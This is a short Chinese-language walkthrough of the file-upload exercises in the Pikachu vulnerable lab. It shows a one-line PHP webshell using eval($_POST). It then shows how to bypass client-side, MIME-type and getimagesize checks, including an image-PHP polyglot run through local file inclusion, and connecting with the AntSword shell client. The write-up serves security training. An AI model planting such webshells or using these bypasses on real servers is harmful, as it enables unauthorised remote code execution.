皮卡丘(pikachu) 文件上传

文件上传(Unsafe Fileupload)

• Client check

首先我们先制作一句话的木马，并且以 .php 命名

<?php

echo "PHP Loaded";       //便于确认是否成功上传

eval($_POST['a']);

?>

提示只允许上传图片

按F12找到οnchange=“”并删除

上传成功

蚁剑连接

• MIME type

上传小马，并抓包

将Content-Type: 改为image/png

放包

显示上传成功

蚁剑连接

• Getimagesize

先制作图片马

准备好一张图片(.png)和一句话的木马(.php)

命令copy /b xxx.png + yyy.php zzz.png

合成图片马zzz.png

上传成功

到上传的目录查看文件

但是图片没有解析，没有执行我们的php代码

所以要结合文件包含

让本地文件包含漏洞找到我们的png图片

到文件包含(local)下

包含我们上传的图片

复制之前上传文件的目录进行包含

加了两个../成功了

蚁剑连接